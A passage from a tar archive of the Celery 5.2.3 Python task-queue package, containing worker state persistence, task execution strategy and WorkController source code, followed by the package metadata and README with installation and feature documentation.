__ready(request) class Persistent: """Stores worker state between restarts. This is the persistent data stored by the worker when :option:`celery worker --statedb` is enabled. 
Currently only stores revoked task id's. """ storage = shelve protocol = pickle_protocol compress = zlib.compress decompress = zlib.decompress _is_open = False def __init__(self, state, filename, clock=None): self.state = state self.filename = filename self.clock = clock self.merge() def open(self): return self.storage.open( self.filename, protocol=self.protocol, writeback=True, ) def merge(self): self._merge_with(self.db) def sync(self): self._sync_with(self.db) self.db.sync() def close(self): if self._is_open: self.db.close() self._is_open = False def save(self): self.sync() self.close() def _merge_with(self, d): self._merge_revoked(d) self._merge_clock(d) return d def _sync_with(self, d): self._revoked_tasks.purge() d.update({ '__proto__': 3, 'zrevoked': self.compress(self._dumps(self._revoked_tasks)), 'clock': self.clock.forward() if self.clock else 0, }) return d def _merge_clock(self, d): if self.clock: d['clock'] = self.clock.adjust(d.get('clock') or 0) def _merge_revoked(self, d): try: self._merge_revoked_v3(d['zrevoked']) except KeyError: try: self._merge_revoked_v2(d.pop('revoked')) except KeyError: pass # purge expired items at boot self._revoked_tasks.purge() def _merge_revoked_v3(self, zrevoked): if zrevoked: self._revoked_tasks.update(pickle.loads(self.decompress(zrevoked))) def _merge_revoked_v2(self, saved): if not isinstance(saved, LimitedSet): # (pre 3.0.18) used to be stored as a dict return self._merge_revoked_v1(saved) self._revoked_tasks.update(saved) def _merge_revoked_v1(self, saved): add = self._revoked_tasks.add for item in saved: add(item) def _dumps(self, obj): return pickle.dumps(obj, protocol=self.protocol) @property def _revoked_tasks(self): return self.state.revoked @cached_property def db(self): self._is_open = True return self.open() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/strategy.py0000664000175000017500000001626500000000000017717 0ustar00asifasif00000000000000"""Task execution strategy (optimization).""" import logging from kombu.asynchronous.timer import to_timestamp from kombu.utils.encoding import safe_repr from celery import signals from celery.app import trace as _app_trace from celery.exceptions import InvalidTaskError from celery.utils.imports import symbol_by_name from celery.utils.log import get_logger from celery.utils.saferepr import saferepr from celery.utils.time import timezone from .request import create_request_cls from .state import task_reserved __all__ = ('default',) logger = get_logger(__name__) # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. 
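# --- Illustrative walk-through of the celery.worker.state helpers defined
# above (not part of the original module).  It only shows how a request moves
# through the module-level globals; ``_FakeRequest`` is a hypothetical
# stand-in for a real Request object.

from celery.worker import state as worker_state


class _FakeRequest:
    def __init__(self, id, name):
        self.id = id
        self.name = name


def _demo_state():
    req = _FakeRequest('task-id-1', 'proj.add')
    worker_state.task_reserved(req)     # -> requests + reserved_requests
    worker_state.task_accepted(req)     # -> active_requests, counters bumped
    worker_state.task_ready(req, successful=True)   # removed again
    assert 'task-id-1' in worker_state.successful_requests
    worker_state.reset_state()          # clean up the globals after the demo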
def hybrid_to_proto2(message, body): """Create a fresh protocol 2 message from a hybrid protocol 1/2 message.""" try: args, kwargs = body.get('args', ()), body.get('kwargs', {}) kwargs.items # pylint: disable=pointless-statement except KeyError: raise InvalidTaskError('Message does not have args/kwargs') except AttributeError: raise InvalidTaskError( 'Task keyword arguments must be a mapping', ) headers = { 'lang': body.get('lang'), 'task': body.get('task'), 'id': body.get('id'), 'root_id': body.get('root_id'), 'parent_id': body.get('parent_id'), 'group': body.get('group'), 'meth': body.get('meth'), 'shadow': body.get('shadow'), 'eta': body.get('eta'), 'expires': body.get('expires'), 'retries': body.get('retries', 0), 'timelimit': body.get('timelimit', (None, None)), 'argsrepr': body.get('argsrepr'), 'kwargsrepr': body.get('kwargsrepr'), 'origin': body.get('origin'), } headers.update(message.headers or {}) embed = { 'callbacks': body.get('callbacks'), 'errbacks': body.get('errbacks'), 'chord': body.get('chord'), 'chain': None, } return (args, kwargs, embed), headers, True, body.get('utc', True) def proto1_to_proto2(message, body): """Convert Task message protocol 1 arguments to protocol 2. Returns: Tuple: of ``(body, headers, already_decoded_status, utc)`` """ try: args, kwargs = body.get('args', ()), body.get('kwargs', {}) kwargs.items # pylint: disable=pointless-statement except KeyError: raise InvalidTaskError('Message does not have args/kwargs') except AttributeError: raise InvalidTaskError( 'Task keyword arguments must be a mapping', ) body.update( argsrepr=saferepr(args), kwargsrepr=saferepr(kwargs), headers=message.headers, ) try: body['group'] = body['taskset'] except KeyError: pass embed = { 'callbacks': body.get('callbacks'), 'errbacks': body.get('errbacks'), 'chord': body.get('chord'), 'chain': None, } return (args, kwargs, embed), body, True, body.get('utc', True) def default(task, app, consumer, info=logger.info, error=logger.error, task_reserved=task_reserved, to_system_tz=timezone.to_system, bytes=bytes, proto1_to_proto2=proto1_to_proto2): """Default task execution strategy. Note: Strategies are here as an optimization, so sadly it's not very easy to override. 
""" hostname = consumer.hostname connection_errors = consumer.connection_errors _does_info = logger.isEnabledFor(logging.INFO) # task event related # (optimized to avoid calling request.send_event) eventer = consumer.event_dispatcher events = eventer and eventer.enabled send_event = eventer and eventer.send task_sends_events = events and task.send_events call_at = consumer.timer.call_at apply_eta_task = consumer.apply_eta_task rate_limits_enabled = not consumer.disable_rate_limits get_bucket = consumer.task_buckets.__getitem__ handle = consumer.on_task_request limit_task = consumer._limit_task limit_post_eta = consumer._limit_post_eta Request = symbol_by_name(task.Request) Req = create_request_cls(Request, task, consumer.pool, hostname, eventer, app=app) revoked_tasks = consumer.controller.state.revoked def task_message_handler(message, body, ack, reject, callbacks, to_timestamp=to_timestamp): if body is None and 'args' not in message.payload: body, headers, decoded, utc = ( message.body, message.headers, False, app.uses_utc_timezone(), ) else: if 'args' in message.payload: body, headers, decoded, utc = hybrid_to_proto2(message, message.payload) else: body, headers, decoded, utc = proto1_to_proto2(message, body) req = Req( message, on_ack=ack, on_reject=reject, app=app, hostname=hostname, eventer=eventer, task=task, connection_errors=connection_errors, body=body, headers=headers, decoded=decoded, utc=utc, ) if _does_info: # Similar to `app.trace.info()`, we pass the formatting args as the # `extra` kwarg for custom log handlers context = { 'id': req.id, 'name': req.name, 'args': safe_repr(req.args), 'kwargs': safe_repr(req.kwargs), } info(_app_trace.LOG_RECEIVED, context, extra={'data': context}) if (req.expires or req.id in revoked_tasks) and req.revoked(): return signals.task_received.send(sender=consumer, request=req) if task_sends_events: send_event( 'task-received', uuid=req.id, name=req.name, args=req.argsrepr, kwargs=req.kwargsrepr, root_id=req.root_id, parent_id=req.parent_id, retries=req.request_dict.get('retries', 0), eta=req.eta and req.eta.isoformat(), expires=req.expires and req.expires.isoformat(), ) bucket = None eta = None if req.eta: try: if req.utc: eta = to_timestamp(to_system_tz(req.eta)) else: eta = to_timestamp(req.eta, app.timezone) except (OverflowError, ValueError) as exc: error("Couldn't convert ETA %r to timestamp: %r. Task: %r", req.eta, exc, req.info(safe=True), exc_info=True) req.reject(requeue=False) if rate_limits_enabled: bucket = get_bucket(task.name) if eta and bucket: consumer.qos.increment_eventually() return call_at(eta, limit_post_eta, (req, bucket, 1), priority=6) if eta: consumer.qos.increment_eventually() call_at(eta, apply_eta_task, (req,), priority=6) return task_message_handler if bucket: return limit_task(req, bucket, 1) task_reserved(req) if callbacks: [callback(req) for callback in callbacks] handle(req) return task_message_handler ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/worker.py0000664000175000017500000003426100000000000017362 0ustar00asifasif00000000000000"""WorkController can be used to instantiate in-process workers. The command-line interface for the worker is in :mod:`celery.bin.worker`, while the worker program is in :mod:`celery.apps.worker`. The worker program is responsible for adding signal handlers, setting up logging, etc. 
This is a bare-bones worker without global side-effects (i.e., except for the global state stored in :mod:`celery.worker.state`). The worker consists of several components, all managed by bootsteps (mod:`celery.bootsteps`). """ import os import sys from datetime import datetime from billiard import cpu_count from kombu.utils.compat import detect_environment from celery import bootsteps from celery import concurrency as _concurrency from celery import signals from celery.bootsteps import RUN, TERMINATE from celery.exceptions import (ImproperlyConfigured, TaskRevokedError, WorkerTerminate) from celery.platforms import EX_FAILURE, create_pidlock from celery.utils.imports import reload_from_cwd from celery.utils.log import mlevel from celery.utils.log import worker_logger as logger from celery.utils.nodenames import default_nodename, worker_direct from celery.utils.text import str_to_list from celery.utils.threads import default_socket_timeout from . import state try: import resource except ImportError: # pragma: no cover resource = None __all__ = ('WorkController',) #: Default socket timeout at shutdown. SHUTDOWN_SOCKET_TIMEOUT = 5.0 SELECT_UNKNOWN_QUEUE = """ Trying to select queue subset of {0!r}, but queue {1} isn't defined in the `task_queues` setting. If you want to automatically declare unknown queues you can enable the `task_create_missing_queues` setting. """ DESELECT_UNKNOWN_QUEUE = """ Trying to deselect queue subset of {0!r}, but queue {1} isn't defined in the `task_queues` setting. """ class WorkController: """Unmanaged worker instance.""" app = None pidlock = None blueprint = None pool = None semaphore = None #: contains the exit code if a :exc:`SystemExit` event is handled. exitcode = None class Blueprint(bootsteps.Blueprint): """Worker bootstep blueprint.""" name = 'Worker' default_steps = { 'celery.worker.components:Hub', 'celery.worker.components:Pool', 'celery.worker.components:Beat', 'celery.worker.components:Timer', 'celery.worker.components:StateDB', 'celery.worker.components:Consumer', 'celery.worker.autoscale:WorkerComponent', } def __init__(self, app=None, hostname=None, **kwargs): self.app = app or self.app self.hostname = default_nodename(hostname) self.startup_time = datetime.utcnow() self.app.loader.init_worker() self.on_before_init(**kwargs) self.setup_defaults(**kwargs) self.on_after_init(**kwargs) self.setup_instance(**self.prepare_args(**kwargs)) def setup_instance(self, queues=None, ready_callback=None, pidfile=None, include=None, use_eventloop=None, exclude_queues=None, **kwargs): self.pidfile = pidfile self.setup_queues(queues, exclude_queues) self.setup_includes(str_to_list(include)) # Set default concurrency if not self.concurrency: try: self.concurrency = cpu_count() except NotImplementedError: self.concurrency = 2 # Options self.loglevel = mlevel(self.loglevel) self.ready_callback = ready_callback or self.on_consumer_ready # this connection won't establish, only used for params self._conninfo = self.app.connection_for_read() self.use_eventloop = ( self.should_use_eventloop() if use_eventloop is None else use_eventloop ) self.options = kwargs signals.worker_init.send(sender=self) # Initialize bootsteps self.pool_cls = _concurrency.get_implementation(self.pool_cls) self.steps = [] self.on_init_blueprint() self.blueprint = self.Blueprint( steps=self.app.steps['worker'], on_start=self.on_start, on_close=self.on_close, on_stopped=self.on_stopped, ) self.blueprint.apply(self, **kwargs) def on_init_blueprint(self): pass def on_before_init(self, **kwargs): pass 
def on_after_init(self, **kwargs): pass def on_start(self): if self.pidfile: self.pidlock = create_pidlock(self.pidfile) def on_consumer_ready(self, consumer): pass def on_close(self): self.app.loader.shutdown_worker() def on_stopped(self): self.timer.stop() self.consumer.shutdown() if self.pidlock: self.pidlock.release() def setup_queues(self, include, exclude=None): include = str_to_list(include) exclude = str_to_list(exclude) try: self.app.amqp.queues.select(include) except KeyError as exc: raise ImproperlyConfigured( SELECT_UNKNOWN_QUEUE.strip().format(include, exc)) try: self.app.amqp.queues.deselect(exclude) except KeyError as exc: raise ImproperlyConfigured( DESELECT_UNKNOWN_QUEUE.strip().format(exclude, exc)) if self.app.conf.worker_direct: self.app.amqp.queues.select_add(worker_direct(self.hostname)) def setup_includes(self, includes): # Update celery_include to have all known task modules, so that we # ensure all task modules are imported in case an execv happens. prev = tuple(self.app.conf.include) if includes: prev += tuple(includes) [self.app.loader.import_task_module(m) for m in includes] self.include = includes task_modules = {task.__class__.__module__ for task in self.app.tasks.values()} self.app.conf.include = tuple(set(prev) | task_modules) def prepare_args(self, **kwargs): return kwargs def _send_worker_shutdown(self): signals.worker_shutdown.send(sender=self) def start(self): try: self.blueprint.start(self) except WorkerTerminate: self.terminate() except Exception as exc: logger.critical('Unrecoverable error: %r', exc, exc_info=True) self.stop(exitcode=EX_FAILURE) except SystemExit as exc: self.stop(exitcode=exc.code) except KeyboardInterrupt: self.stop(exitcode=EX_FAILURE) def register_with_event_loop(self, hub): self.blueprint.send_all( self, 'register_with_event_loop', args=(hub,), description='hub.register', ) def _process_task_sem(self, req): return self._quick_acquire(self._process_task, req) def _process_task(self, req): """Process task by sending it to the pool of workers.""" try: req.execute_using_pool(self.pool) except TaskRevokedError: try: self._quick_release() # Issue 877 except AttributeError: pass def signal_consumer_close(self): try: self.consumer.close() except AttributeError: pass def should_use_eventloop(self): return (detect_environment() == 'default' and self._conninfo.transport.implements.asynchronous and not self.app.IS_WINDOWS) def stop(self, in_sighandler=False, exitcode=None): """Graceful shutdown of the worker server.""" if exitcode is not None: self.exitcode = exitcode if self.blueprint.state == RUN: self.signal_consumer_close() if not in_sighandler or self.pool.signal_safe: self._shutdown(warm=True) self._send_worker_shutdown() def terminate(self, in_sighandler=False): """Not so graceful shutdown of the worker server.""" if self.blueprint.state != TERMINATE: self.signal_consumer_close() if not in_sighandler or self.pool.signal_safe: self._shutdown(warm=False) def _shutdown(self, warm=True): # if blueprint does not exist it means that we had an # error before the bootsteps could be initialized. 
if self.blueprint is not None: with default_socket_timeout(SHUTDOWN_SOCKET_TIMEOUT): # Issue 975 self.blueprint.stop(self, terminate=not warm) self.blueprint.join() def reload(self, modules=None, reload=False, reloader=None): list(self._reload_modules( modules, force_reload=reload, reloader=reloader)) if self.consumer: self.consumer.update_strategies() self.consumer.reset_rate_limits() try: self.pool.restart() except NotImplementedError: pass def _reload_modules(self, modules=None, **kwargs): return ( self._maybe_reload_module(m, **kwargs) for m in set(self.app.loader.task_modules if modules is None else (modules or ())) ) def _maybe_reload_module(self, module, force_reload=False, reloader=None): if module not in sys.modules: logger.debug('importing module %s', module) return self.app.loader.import_from_cwd(module) elif force_reload: logger.debug('reloading module %s', module) return reload_from_cwd(sys.modules[module], reloader) def info(self): uptime = datetime.utcnow() - self.startup_time return {'total': self.state.total_count, 'pid': os.getpid(), 'clock': str(self.app.clock), 'uptime': round(uptime.total_seconds())} def rusage(self): if resource is None: raise NotImplementedError('rusage not supported by this platform') s = resource.getrusage(resource.RUSAGE_SELF) return { 'utime': s.ru_utime, 'stime': s.ru_stime, 'maxrss': s.ru_maxrss, 'ixrss': s.ru_ixrss, 'idrss': s.ru_idrss, 'isrss': s.ru_isrss, 'minflt': s.ru_minflt, 'majflt': s.ru_majflt, 'nswap': s.ru_nswap, 'inblock': s.ru_inblock, 'oublock': s.ru_oublock, 'msgsnd': s.ru_msgsnd, 'msgrcv': s.ru_msgrcv, 'nsignals': s.ru_nsignals, 'nvcsw': s.ru_nvcsw, 'nivcsw': s.ru_nivcsw, } def stats(self): info = self.info() info.update(self.blueprint.info(self)) info.update(self.consumer.blueprint.info(self.consumer)) try: info['rusage'] = self.rusage() except NotImplementedError: info['rusage'] = 'N/A' return info def __repr__(self): """``repr(worker)``.""" return ''.format( self=self, state=self.blueprint.human_state() if self.blueprint else 'INIT', ) def __str__(self): """``str(worker) == worker.hostname``.""" return self.hostname @property def state(self): return state def setup_defaults(self, concurrency=None, loglevel='WARN', logfile=None, task_events=None, pool=None, consumer_cls=None, timer_cls=None, timer_precision=None, autoscaler_cls=None, pool_putlocks=None, pool_restarts=None, optimization=None, O=None, # O maps to -O=fair statedb=None, time_limit=None, soft_time_limit=None, scheduler=None, pool_cls=None, # XXX use pool state_db=None, # XXX use statedb task_time_limit=None, # XXX use time_limit task_soft_time_limit=None, # XXX use soft_time_limit scheduler_cls=None, # XXX use scheduler schedule_filename=None, max_tasks_per_child=None, prefetch_multiplier=None, disable_rate_limits=None, worker_lost_wait=None, max_memory_per_child=None, **_kw): either = self.app.either self.loglevel = loglevel self.logfile = logfile self.concurrency = either('worker_concurrency', concurrency) self.task_events = either('worker_send_task_events', task_events) self.pool_cls = either('worker_pool', pool, pool_cls) self.consumer_cls = either('worker_consumer', consumer_cls) self.timer_cls = either('worker_timer', timer_cls) self.timer_precision = either( 'worker_timer_precision', timer_precision, ) self.optimization = optimization or O self.autoscaler_cls = either('worker_autoscaler', autoscaler_cls) self.pool_putlocks = either('worker_pool_putlocks', pool_putlocks) self.pool_restarts = either('worker_pool_restarts', pool_restarts) self.statedb = 
either('worker_state_db', statedb, state_db) self.schedule_filename = either( 'beat_schedule_filename', schedule_filename, ) self.scheduler = either('beat_scheduler', scheduler, scheduler_cls) self.time_limit = either( 'task_time_limit', time_limit, task_time_limit) self.soft_time_limit = either( 'task_soft_time_limit', soft_time_limit, task_soft_time_limit, ) self.max_tasks_per_child = either( 'worker_max_tasks_per_child', max_tasks_per_child, ) self.max_memory_per_child = either( 'worker_max_memory_per_child', max_memory_per_child, ) self.prefetch_multiplier = int(either( 'worker_prefetch_multiplier', prefetch_multiplier, )) self.disable_rate_limits = either( 'worker_disable_rate_limits', disable_rate_limits, ) self.worker_lost_wait = either('worker_lost_wait', worker_lost_wait) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.351749 celery-5.2.3/celery.egg-info/0000775000175000017500000000000000000000000015652 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/PKG-INFO0000664000175000017500000004261400000000000016756 0ustar00asifasif00000000000000Metadata-Version: 2.1 Name: celery Version: 5.2.3 Summary: Distributed Task Queue. Home-page: http://celeryproject.org Author: Ask Solem Author-email: auvipy@gmail.com License: BSD Project-URL: Documentation, https://docs.celeryproject.org/en/latest/index.html Project-URL: Changelog, https://docs.celeryproject.org/en/stable/changelog.html Project-URL: Code, https://github.com/celery/celery Project-URL: Tracker, https://github.com/celery/celery/issues Project-URL: Funding, https://opencollective.com/celery Keywords: task job queue distributed messaging actor Platform: any Classifier: Development Status :: 5 - Production/Stable Classifier: License :: OSI Approved :: BSD License Classifier: Topic :: System :: Distributed Computing Classifier: Topic :: Software Development :: Object Brokering Classifier: Framework :: Celery Classifier: Programming Language :: Python Classifier: Programming Language :: Python :: 3 :: Only Classifier: Programming Language :: Python :: 3 Classifier: Programming Language :: Python :: 3.7 Classifier: Programming Language :: Python :: 3.8 Classifier: Programming Language :: Python :: 3.9 Classifier: Programming Language :: Python :: 3.10 Classifier: Programming Language :: Python :: Implementation :: CPython Classifier: Programming Language :: Python :: Implementation :: PyPy Classifier: Operating System :: OS Independent Requires-Python: >=3.7, Provides-Extra: dynamodb Provides-Extra: consul Provides-Extra: auth Provides-Extra: sqlalchemy Provides-Extra: memcache Provides-Extra: pyro Provides-Extra: yaml Provides-Extra: pytest Provides-Extra: zookeeper Provides-Extra: mongodb Provides-Extra: azureblockblob Provides-Extra: sqs Provides-Extra: cosmosdbsql Provides-Extra: django Provides-Extra: brotli Provides-Extra: eventlet Provides-Extra: librabbitmq Provides-Extra: couchdb Provides-Extra: arangodb Provides-Extra: tblib Provides-Extra: redis Provides-Extra: slmq Provides-Extra: msgpack Provides-Extra: elasticsearch Provides-Extra: cassandra Provides-Extra: gevent Provides-Extra: zstd Provides-Extra: pymemcache Provides-Extra: couchbase Provides-Extra: s3 Provides-Extra: solar License-File: LICENSE .. 
image:: http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png |build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge| :Version: 5.2.3 (dawn-chorus) :Web: https://docs.celeryproject.org/en/stable/index.html :Download: https://pypi.org/project/celery/ :Source: https://github.com/celery/celery/ :Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors Donations ========= This project relies on your generous donations. If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. .. _`backer`: https://opencollective.com/celery#backer .. _`sponsor`: https://opencollective.com/celery#sponsor For enterprise ============== Available as part of the Tidelift Subscription. The maintainers of ``celery`` and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. `Learn more. `_ What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work, called a task, dedicated worker processes then constantly monitor the queue for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task a client puts a message on the queue, the broker then delivers the message to a worker. A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ for Node.js, a `PHP client`_, `gocelery`_ for golang, and rusty-celery_ for Rust. Language interoperability can also be achieved by using webhooks in such a way that the client enqueues an URL to be requested by a worker. .. _node-celery: https://github.com/mher/node-celery .. _`PHP client`: https://github.com/gjedeer/celery-php .. _`gocelery`: https://github.com/gocelery/gocelery .. _rusty-celery: https://github.com/rusty-celery/rusty-celery What do I need? =============== Celery version 5.2.0 runs on, - Python (3.7, 3.8, 3.9, 3.10) - PyPy3.7 (7.3.7+) This is the version of celery which will support Python 3.7 or newer. If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4: Celery series 2.2 or earlier. - Python 2.7: Celery 4.x series. - Python 3.6: Celery 5.1 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* is usually used with a message broker to send and receive messages. The RabbitMQ, Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across datacenters. 
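To initiate work, a client simply calls a task and whichever worker picks up
the message executes it.  A minimal sketch (the ``tasks`` module, its ``add``
task and a configured result backend are assumed here, not shipped with
Celery):

.. code-block:: python

    from tasks import add        # a module defining an @app.task named add

    result = add.delay(2, 2)     # send the task message to the broker
    result.get(timeout=10)       # wait for a worker to store the result: 4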
Get Started =========== If this is the first time you're trying to use Celery, or if you're new to Celery v5.2.0 and coming from previous versions, then you should read our getting started tutorials: - `First steps with Celery`_ Tutorial teaching you the bare minimum needed to get started with Celery. - `Next steps`_ A more complete overview, showing more features. .. _`First steps with Celery`: http://docs.celeryproject.org/en/latest/getting-started/first-steps-with-celery.html .. _`Next steps`: http://docs.celeryproject.org/en/latest/getting-started/next-steps.html You can also get started with Celery by using CloudAMQP, a hosted broker transport. The largest hosting provider of RabbitMQ is a proud sponsor of Celery. Celery is... ============= - **Simple** Celery is easy to use and maintain, and does *not need configuration files*. It has an active, friendly community you can talk to for support, like at our `mailing-list`_, or the IRC channel. Here's one of the simplest applications you can make: .. code-block:: python from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA by way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own: custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. It supports... ================ - **Message Transports** - RabbitMQ_, Redis_, Amazon SQS - **Concurrency** - Prefork, Eventlet_, gevent_, single threaded (``solo``) - **Result Stores** - AMQP, Redis - memcached - SQLAlchemy, Django ORM - Apache Cassandra, IronCache, Elasticsearch - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ .. _RabbitMQ: https://rabbitmq.com .. _Redis: https://redis.io .. _SQLAlchemy: http://sqlalchemy.org Framework Integration ===================== Celery is easy to integrate with web frameworks, some of which even have integration packages: +--------------------+------------------------+ | `Django`_ | not needed | +--------------------+------------------------+ | `Pyramid`_ | `pyramid_celery`_ | +--------------------+------------------------+ | `Pylons`_ | `celery-pylons`_ | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | `web2py-celery`_ | +--------------------+------------------------+ | `Tornado`_ | `tornado-celery`_ | +--------------------+------------------------+ The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at ``fork``. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonsproject.org/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ .. _`celery-pylons`: https://pypi.org/project/celery-pylons/ .. 
_`web2py-celery`: https://code.google.com/p/web2py-celery/ .. _`Tornado`: http://www.tornadoweb.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ .. _celery-documentation: Documentation ============= The `latest documentation`_ is hosted at Read The Docs, containing user guides, tutorials, and an API reference. The latest Chinese documentation is hosted at https://www.celerycn.io/, and includes user guides, tutorials, and an API reference. .. _`latest documentation`: http://docs.celeryproject.org/en/latest/ .. _celery-installation: Installation ============ You can install Celery either via the Python Package Index (PyPI) or from source. To install using ``pip``: :: $ pip install -U Celery .. _bundles: Bundles ------- Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature. You can specify these in your requirements or on the ``pip`` command-line by using brackets. Multiple bundles can be specified by separating them with commas. :: $ pip install "celery[amqp]" $ pip install "celery[amqp,redis,auth,msgpack]" The following bundles are available: Serializers ~~~~~~~~~~~ :``celery[auth]``: for using the ``auth`` security serializer. :``celery[msgpack]``: for using the msgpack serializer. :``celery[yaml]``: for using the yaml serializer. Concurrency ~~~~~~~~~~~ :``celery[eventlet]``: for using the ``eventlet`` pool. :``celery[gevent]``: for using the ``gevent`` pool. Transports and Backends ~~~~~~~~~~~~~~~~~~~~~~~ :``celery[amqp]``: for using the RabbitMQ amqp Python library. :``celery[redis]``: for using Redis as a message transport or as a result backend. :``celery[sqs]``: for using Amazon SQS as a message transport. :``celery[tblib]``: for using the ``task_remote_tracebacks`` feature. :``celery[memcache]``: for using Memcached as a result backend (using ``pylibmc``). :``celery[pymemcache]``: for using Memcached as a result backend (pure-Python implementation). :``celery[cassandra]``: for using Apache Cassandra as a result backend with the DataStax driver. :``celery[azureblockblob]``: for using Azure Storage as a result backend (using ``azure-storage``). :``celery[s3]``: for using S3 Storage as a result backend. :``celery[couchbase]``: for using Couchbase as a result backend. :``celery[arangodb]``: for using ArangoDB as a result backend. :``celery[elasticsearch]``: for using Elasticsearch as a result backend. :``celery[riak]``: for using Riak as a result backend. :``celery[cosmosdbsql]``: for using Azure Cosmos DB as a result backend (using ``pydocumentdb``). :``celery[zookeeper]``: for using Zookeeper as a message transport. :``celery[sqlalchemy]``: for using SQLAlchemy as a result backend (*supported*). :``celery[pyro]``: for using the Pyro4 message transport (*experimental*). :``celery[slmq]``: for using the SoftLayer Message Queue transport (*experimental*). :``celery[consul]``: for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). :``celery[django]``: specifies the lowest version possible for Django support. You should probably not use this in your requirements, it's here for informational purposes only. .. _celery-installing-from-source: Downloading and installing from source -------------------------------------- Download the latest version of Celery from PyPI: https://pypi.org/project/celery/ You can install it by doing the following: :: $ tar xvfz celery-0.0.0.tar.gz $ cd celery-0.0.0 $ python setup.py build # python setup.py install The last command must be executed as a privileged user if you aren't currently using a virtualenv. .. 
_celery-installing-from-git: Using the development version ----------------------------- With pip ~~~~~~~~ The Celery development version also requires the development versions of ``kombu``, ``amqp``, ``billiard``, and ``vine``. You can install the latest snapshot of these using the following pip commands: :: $ pip install https://github.com/celery/celery/zipball/master#egg=celery $ pip install https://github.com/celery/billiard/zipball/master#egg=billiard $ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp $ pip install https://github.com/celery/kombu/zipball/master#egg=kombu $ pip install https://github.com/celery/vine/zipball/master#egg=vine With git ~~~~~~~~ Please see the Contributing section. .. _getting-help: Getting Help ============ .. _mailing-list: Mailing list ------------ For discussions about the usage, development, and future of Celery, please join the `celery-users`_ mailing list. .. _`celery-users`: https://groups.google.com/group/celery-users/ .. _irc-channel: IRC --- Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_ network. .. _`Libera Chat`: https://libera.chat/ .. _bug-tracker: Bug tracker =========== If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/ .. _wiki: Wiki ==== https://github.com/celery/celery/wiki Credits ======= .. _contributing-short: Contributors ------------ This project exists thanks to all the people who contribute. Development of `celery` happens at GitHub: https://github.com/celery/celery You're highly encouraged to participate in the development of `celery`. If you don't like GitHub (for some reason) you're welcome to send regular patches. Be sure to also read the `Contributing to Celery`_ section in the documentation. .. _`Contributing to Celery`: http://docs.celeryproject.org/en/master/contributing.html |oc-contributors| .. |oc-contributors| image:: https://opencollective.com/celery/contributors.svg?width=890&button=false :target: https://github.com/celery/celery/graphs/contributors Backers ------- Thank you to all our backers! 🙏 [`Become a backer`_] .. _`Become a backer`: https://opencollective.com/celery#backer |oc-backers| .. |oc-backers| image:: https://opencollective.com/celery/backers.svg?width=890 :target: https://opencollective.com/celery#backers Sponsors -------- Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [`Become a sponsor`_] .. _`Become a sponsor`: https://opencollective.com/celery#sponsor |oc-sponsors| .. |oc-sponsors| image:: https://opencollective.com/celery/sponsor/0/avatar.svg :target: https://opencollective.com/celery/sponsor/0/website .. _license: License ======= This software is licensed under the `New BSD License`. See the ``LICENSE`` file in the top distribution directory for the full license text. .. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround .. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg :alt: Build status :target: https://github.com/celery/celery/actions/workflows/python-package.yml .. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master :target: https://codecov.io/github/celery/celery?branch=master .. |license| image:: https://img.shields.io/pypi/l/celery.svg :alt: BSD License :target: https://opensource.org/licenses/BSD-3-Clause .. 
